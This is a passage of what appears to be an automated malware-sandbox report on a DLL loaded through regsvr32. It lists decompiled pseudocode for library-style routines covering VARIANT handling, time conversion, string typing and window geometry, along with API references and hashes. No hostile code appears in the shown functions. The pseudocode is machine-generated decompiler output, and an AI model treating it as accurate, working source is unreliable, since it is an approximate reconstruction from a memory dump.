														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000E754(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010578(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E100014B0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010578(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010578(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}

0x1000ece8
0x1000eced
0x1000ecf8
0x1000ecff
0x1000ed0b
0x1000ed0e
0x1000ed13
0x1000ed1f
0x1000ed22
0x1000ed27
0x1000ed2b
0x1000ed46
0x1000ed4f
0x1000ed5a
0x1000ed5a
0x1000ed5e
0x1000ed69
0x1000ed6b
0x1000efec
0x1000efec
0x1000eff1
0x00000000
0x1000eff7
0x1000eff7
0x1000eff7
0x1000eff8
0x1000f14b
0x1000f150
0x1000f152
0x1000f158
0x1000f15b
0x1000f15e
0x1000f160
0x1000f160
0x1000f160
0x1000f160
0x1000f163
0x1000f163
0x1000f160
0x1000f16b
0x1000f16e
0x1000f170
0x1000f172
0x1000f174
0x1000f174
0x1000f176
0x1000f179
0x1000f186
0x1000f18a
0x1000f18f
0x00000000
0x1000f18f
0x1000effe
0x1000efff
0x1000efff
0x1000f000
0x1000f0ef
0x1000f0f4
0x1000f0f6
0x1000f100
0x1000f106
0x1000f116
0x1000f119
0x1000f11e
0x1000f127
0x1000f131
0x1000f135
0x1000f13a
0x00000000
0x1000f13a
0x1000f006
0x1000f006
0x1000f006
0x1000f007
0x1000f08d
0x1000f092
0x1000f094
0x1000f09e
0x1000f0a1
0x1000f0b1
0x1000f0b4
0x1000f0b9
0x1000f0c5
0x1000f0d5
0x1000f0d9
0x1000f0de
0x00000000
0x1000f0de
0x1000f009
0x1000f009
0x1000f00a
0x1000f019
0x1000f01e
0x1000f020
0x1000f04a
0x1000f04f
0x1000f05a
0x1000f06a
0x1000f06e
0x1000f073
0x00000000
0x1000f073
0x1000f020
0x1000f00a
0x1000f007
0x1000f000
0x1000eff8
0x1000ed71
0x1000ed71
0x1000efb5
0x1000efc5
0x1000efc9
0x1000efd2
0x1000efd6
0x1000efe2
0x1000efe4
0x00000000
0x1000ed77
0x1000ed77
0x1000ed7a
0x1000ee87
0x1000ee8a
0x1000ef8a
0x1000ef93
0x1000ef97
0x1000ef9c
0x00000000
0x1000ee90
0x1000ee90
0x1000ee93
0x1000ef57
0x1000ef60
0x1000ef64
0x1000ef69
0x00000000
0x1000ee99
0x1000ee99
0x1000ee9c
0x1000eea2
0x1000eea5
0x1000ef1e
0x1000ef25
0x1000ef2b
0x1000ef35
0x1000ef39
0x1000ef3e
0x00000000
0x1000eea7
0x1000eea7
0x1000eeaa
0x00000000
0x1000eeac
0x1000eeac
0x1000eeaf
0x00000000
0x00000000
0x1000eeaf
0x1000eeaa
0x1000eea5
0x1000ee9c
0x1000ee93
0x1000ed80
0x1000ed80
0x1000f197
0x1000f1a5
0x1000f1b5
0x1000f1b9
0x1000f1c2
0x1000f1c6
0x1000f1d2
0x1000f1d4
0x1000f1d7
0x1000f1d7
0x1000f1da
0x1000f1dd
0x1000ed86
0x1000ed87
0x1000ed87
0x1000ed88
0x1000eee6
0x1000eefc
0x1000ef05
0x1000ef09
0x1000ef0e
0x00000000
0x1000ed8e
0x1000ed8e
0x1000ed8e
0x1000ed8f
0x1000eeb5
0x1000eec9
0x1000eed2
0x1000eed6
0x1000eedb
0x00000000
0x1000ed95
0x1000ed95
0x1000ed95
0x1000ed96
0x1000ee5a
0x1000ee60
0x1000ee73
0x1000ee77
0x1000ee7c
0x00000000
0x1000ed9c
0x1000ed9c
0x1000ed9c
0x1000ed9d
0x1000ee21
0x1000ee27
0x1000ee3a
0x1000ee3e
0x1000ee43
0x00000000
0x1000ed9f
0x1000ed9f
0x1000ed9f
0x1000eda0
0x1000ede7
0x1000edf1
0x1000edf7
0x1000edfa
0x1000ee04
0x1000ee08
0x1000ee0d
0x00000000
0x1000eda2
0x1000eda2
0x1000eda3
0x1000edb5
0x1000edbb
0x1000edce
0x1000edd2
0x1000edd7
0x1000f079
0x1000f07a
0x1000f07d
0x1000f07d
0x1000eda3
0x1000eda0
0x1000ed9d
0x1000ed96
0x1000ed8f
0x1000ed88
0x1000ed80
0x1000ed7a
0x1000ed71
0x1000f1e9
0x1000f1f2
0x1000f1f2
0x1000f1fc
0x1000f20d

APIs

__EH_prolog.LIBCMT ref: 1000ECED
VariantClear.OLEAUT32(?), ref: 1000ED4F
VariantClear.OLEAUT32(00000007), ref: 1000F07D
VariantClear.OLEAUT32(?), ref: 1000F1F2

Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580

Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F

VariantClear.OLEAUT32(?), ref: 1000F1D2

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$Clear$Time$CopyH_prologSystem
String ID:
API String ID: 2075586698-0
Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61

Uniqueness

Uniqueness Score: -1.00%

Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON

Download Yara Rule

APIs

Part of subcall function 100304C6: PeekMessageA.USER32 ref: 10030507
Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568

Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4

GetWindowRect.USER32 ref: 10030BDC

Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD

GetWindowRect.USER32 ref: 10030CA6
InflateRect.USER32(?,00000002,00000002), ref: 10030D5E

Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372

Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725

Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E

GetWindowRect.USER32 ref: 10030D79
InflateRect.USER32(?,00000002,00000002), ref: 10030E61
InflateRect.USER32(?,00000002,00000002), ref: 10030E74

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
String ID:
API String ID: 2136250054-0
Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}

0x100134e7
0x100134ee
0x100134f1
0x100134f4
0x100134f8
0x100134fa
0x100136ef
0x100136ef
0x100136ef
0x00000000
0x1001350a
0x1001350a
0x10013510
0x00000000
0x00000000
0x10013516
0x10013520
0x10013520
0x10013521
0x10013526
0x10013529
0x1001352b
0x1001352d
0x10013595
0x1001359a
0x100135a1
0x100135a3
0x100135de
0x100135e0
0x100135e3
0x100135e8
0x100135ea
0x100135eb
0x100135eb
0x100135ed
0x100135ef
0x100135f2
0x100135f5
0x100135fa
0x100135ff
0x10013601
0x10013603
0x10013608
0x1001360a
0x1001360e
0x1001360e
0x1001361b
0x10013627
0x1001362b
0x10013631
0x10013634
0x10013637
0x1001363c
0x1001363e
0x10013641
0x10013646
0x10013649
0x1001364d
0x1001364d
0x1001365a
0x10013666
0x1001366a
0x10013670
0x10013673
0x10013676
0x1001367b
0x1001367d
0x10013680
0x10013685
0x10013688
0x1001368c
0x1001368c
0x10013699
0x1001369e
0x100136a0
0x100136a3
0x100136a6
0x00000000
0x100136a8
0x100136a8
0x100136ae
0x100136b5
0x100136b8
0x100136bb
0x100136c1
0x100136c4
0x100136c7
0x100136c9
0x100136e7
0x100136e7
0x100136e7
0x100136cb
0x100136ce
0x100136d1
0x100136d4
0x100136db
0x100136db
0x00000000
0x100136c9
0x100136aa
0x100136ac
0x00000000
0x00000000
0x00000000
0x100136ac
0x100136a6
0x100135a5
0x100135a6
0x100135ab
0x100135ae
0x00000000
0x00000000
0x100135b0
0x100135b6
0x100135bd
0x100135c4
0x100135c7
0x100135c9
0x100135cc
0x100135cf
0x100135d6
0x100135d9
0x00000000
0x10013539
0x10013539
0x1001353e
0x10013544
0x10013547
0x1001354a
0x1001354d
0x10013552
0x10013559
0x1001355b
0x10013561
0x1001356a
0x10013570
0x10013575
0x10013576
0x1001357d
0x10013585
0x10013588
0x10013588
0x1001356a
0x100136ea
0x100136ea
0x100136f1
0x100136f4
0x100136f4
0x1001352d
0x10013518
0x1001351a
0x00000000
0x00000000
0x00000000
0x1001351a

APIs

Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61

__allrem.LIBCMT ref: 100135FA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
__allrem.LIBCMT ref: 10013637
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
__allrem.LIBCMT ref: 10013676
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699

Part of subcall function 10019447: __lock.LIBCMT ref: 10019455

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
String ID:
API String ID: 1282128132-0
Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40

Uniqueness

Uniqueness Score: -1.00%

Function 1001843D Relevance: 9.1, APIs: 6, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}

0x1001843d
0x1001843d
0x1001843f
0x10018444
0x10018449
0x1001844b
0x10018451
0x10018469
0x10018473
0x10018479
0x1001847c
0x1001847e
0x1001847e
0x1001846b
0x1001846b
0x1001846b
0x10018469
0x10018488
0x10018490
0x10018580
0x10018583
0x10018585
0x10018587
0x10018587
0x1001858d
0x10018590
0x10018592
0x10018594
0x10018594
0x1001859b
0x100185a1
0x100185a4
0x100185aa
0x100185ac
0x100185cc
0x100185df
0x100185e1
0x100185e3
0x100185e5
0x100185e6
0x100185eb
0x100185ec
0x00000000
0x100185ec
0x100185ae
0x100185b0
0x100185b5
0x100185b6
0x100185b9
0x100185ba
0x100185c3
0x100185c5
0x100185c7
0x00000000
0x00000000
0x100185c9
0x00000000
0x00000000
0x00000000
0x00000000
0x1001849e
0x100184a1
0x100185a6
0x100185a6
0x100185ee
0x100185f6
0x100185f6
0x100184a7
0x100184aa
0x100184b0
0x100184b2
0x100184b7
0x100184b7
0x100184db
0x100184dd
0x100184e2
0x00000000
0x100184e8
0x100184e8
0x100184ec
0x100184f7
0x100184fc
0x100184ff
0x10018501
0x10018508
0x10018510
0x1001852b
0x1001852d
0x10018546
0x10018553
0x1001855b
0x1001856b
0x1001856b
0x1001856e
0x10018572
0x10018574
0x10018575
0x1001857a
0x1001857b
0x00000000
0x1001852f
0x1001852f
0x10018530
0x10018539
0x1001853d
0x00000000
0x00000000
0x1001853f
0x00000000
0x1001853f
0x1001852d
0x100184e2

APIs

GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
GetLastError.KERNEL32 ref: 10018473
MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0

Uniqueness

Uniqueness Score: -1.00%

